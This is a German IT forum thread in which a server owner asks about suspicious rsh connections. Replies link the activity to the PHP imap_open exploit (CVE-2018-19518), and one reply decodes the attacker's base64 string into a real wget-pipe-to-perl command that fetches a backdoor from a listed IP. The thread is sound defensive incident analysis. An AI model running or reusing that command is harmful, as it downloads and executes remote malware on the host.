Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWünsch Dir wasWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst Ungewöhnliche SSH Verbindungen

Mitglied: lord-icon

lord-icon (Level 1) - Jetzt verbinden

15.02.2019 um 15:33 Uhr, 844 Aufrufe, 3 Kommentare

Am Dienstag hatte ich merkwürdige SSH Verbindungen festgestellt.

In den Logs sind massig fehlerhafte Loginversuche aufgeführt. Ein direkter Login konnte ich nicht feststellen.
Da ich es auch nicht ausschließen konnte und nichts sagenhaft bewegendes drauf läuft hab ich kurzrum einen neuen Server aufgesetzt und aus n Backup die HTML Daten wiederhergestellt. Vom Server stammen nur die Datenbanken.
Passwörter hab ich auch geändert. Aktuell ist der Server wieder lauffähig ohne SSH-Attacken. Fail2bann wurde diemal auch eingerichtet.


So.. nun meine Frage an euch:
Der Server ist nachwievor einsatzbereit. Wenn ich diesen wieder anfahre, dann dauert es nicht lange und die Verbindungen sind wieder da.
Würde diesen also nur zeitweise alias Honeypot einschalten.
Grund: Ich würde schon gern rausbekommen wollen
a: was passiert da. rsh über www-data ?? Schon mal sehr ungewöhnlich
b: kann einer diesen base64 Code entschlüsseln ? bzw. mir sagen, was da versucht wird ?

Da ich wa von proxy gelesen habe habe ich natürlich auch mal ein nmap -v gecannt. Hier sind keine weiteren ungewünschten Ports sichtbar (21/22/25/80/443/465)

Habt Dank für Ideen

P.s. ist ein altes eigensgeschriebenes Script. Damit ich es evtl. überarbeiten müsste ich natürlich wissen, wie und worüber die reingekommen sind.
Wenn es SSH war, dann sollte das Problem mit dem neuaufsetzen erledigt sein. Hat man was gefunden in den php-Scripten ist es nur ne Frage der Zeit bis die neue IP gefunden wird.

unbenannt - Klicke auf das Bild, um es zu vergrößern
Mitglied: SeaStorm
LÖSUNG 15.02.2019 um 15:47 Uhr
Hi

sieht mir nach dem imap_open+rsh exploit aus:

https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-19518.ht ...

Hier ein paar mehr Infos:
https://bugs.launchpad.net/ubuntu/+source/php7.2/+bug/1803657



also: PHP (und rsh) aktuell halten !
Bitte warten ..
Mitglied: 138810
LÖSUNG 15.02.2019, aktualisiert um 16:19 Uhr
kann einer diesen base64 Code entschlüsseln ? bzw. mir sagen, was da versucht wird ?
Da wird der Malware Payload der des o.g. Exploits von einem gehackten Server über wget geladen und direkt an perl zum Ausführen weitergegeben.

d2dldCAtcU8gLSBodHRwOi8vMTQ2LjE4NS4xNjcuMzkvc2F4b3xwZXJswget -qO - http://146.185.167.39/saxo|perl

Mit folgendem Perl - Code für die Backdoor zum CC Server

Bitte warten ..
Mitglied: erikro
LÖSUNG 15.02.2019 um 16:13 Uhr
Moin,

Zitat von lord-icon:
b: kann einer diesen base64 Code entschlüsseln ? bzw. mir sagen, was da versucht wird ?

https://www.base64decode.org/

hth

Erik
Bitte warten ..
Ähnliche Inhalte
Datenbanken
SSH Tunnel Verbindung zu MongoDB Server
Frage von winlinDatenbanken5 Kommentare

Hallo ich habe einen Firmenlaptop (im Firmennetzwerk) auf dem Putty und Ubuntu als VM installiert ist. Über diesen Laptop ...

Netzwerke

SSH - Wieso werde ich nach VPN Verbindung rausgeschmissen?

Frage von VernoxVernaxNetzwerke10 Kommentare

Hallo, ich habe es endlich geschafft mein Handy mit einer VPN Verbindung an meinen Router anzuschließen. Nach der Login ...

Debian

SSH Verbindung zu meinem neuen PI2: Connection refused

gelöst Frage von M.MarzDebian5 Kommentare

Hallo zusammen, ich habe eben meinen Pi2 neu aufgesetzt und den updates ziehen lassen. Über Putty habe ich die ...

Netzwerke

SSH - Programm über SSH Client starten

Frage von VernoxVernaxNetzwerke9 Kommentare

Hallo. Ich habe eben es irgendwie geschafft mein Handy und meinen Pc über SSH zu verbinden. Mit der tollen ...

Neue Wissensbeiträge
Datenschutz
Datenschutzproblem?
Information von Penny.Cilin vor 6 StundenDatenschutz1 Kommentar

Hallo, gerade im Heise Newsticker gefunden: Frage: Warum wurden die Akten nicht ordnungsgemäß gesichert bzw. aufbewahrt? Patientenakten sind 30 ...

Windows Netzwerk

SCOM ( System Center Operations Manager ) um eine E-Mailschnittstelle erweitern

Anleitung von Juanito vor 1 TagWindows Netzwerk

Einleitung System Center Operations Manager (SCOM) ist Microsoft's Lösung zum Überwachen von Servern. Dazu zählt die generelle Erreichbarkeit, Festplattenspeicher, ...

Humor (lol)
BioShield gegen 5G
Information von magicteddy vor 2 TagenHumor (lol)3 Kommentare

Moin wer sich gegen die hochgefährlichen 5G schützen möchte wird hier fündig: 5GBioShield "gegen 5G-Strahlung" Ich glaube, ich sollte ...

Windows Server

ScheduledTasks mit einem Group-Managed-Service-Account (GMSA) ausführen

Anleitung von ToniHo vor 2 TagenWindows Server

Hallo zusammen, wer schonmal versucht hat ein Group-Managed-Service-Account (GMSA) auf einem bestehenden ScheduledTask einzutragen, ist an der GUI vermutlich ...

Heiß diskutierte Inhalte
Ubuntu
Ubuntu FileServer (inkl Hochverfügbarkeit)
Frage von 135345Ubuntu18 Kommentare

Hallo zusammen, ich wollte mal nachhorchen, wie Ihr etwas bei eurem Kunden oder bei euch selbst umgesetzt habt? Als ...

Festplatten, SSD, Raid
Wie Festplatte von altem Notebook sicher löschen
gelöst Frage von NilsholgerssonFestplatten, SSD, Raid12 Kommentare

Hallo, habe ein altes P3 Celeron 800 Notebook, dessen Festplatte ich sicher löschen möchte. Habe von der Ultimate Boot ...

Router & Routing
VPN Router hinter Glasfaser Router des ISP
gelöst Frage von TenerifeITRouter & Routing10 Kommentare

Hallo zusammen, ich habe bisher noch keine VPN Router eingerichtet und nun von einem Kunden 2 TP-Link TL-R600VPN Router ...

Microsoft
USB-Ports sperren mit Software
Frage von trabajadorMicrosoft10 Kommentare

Hallo, gesucht wird eine Software, welche alle USB-Ports sperrt bis auf für Maus, Tastatur und einem Admin-USB-Stick. Verwendet wird ...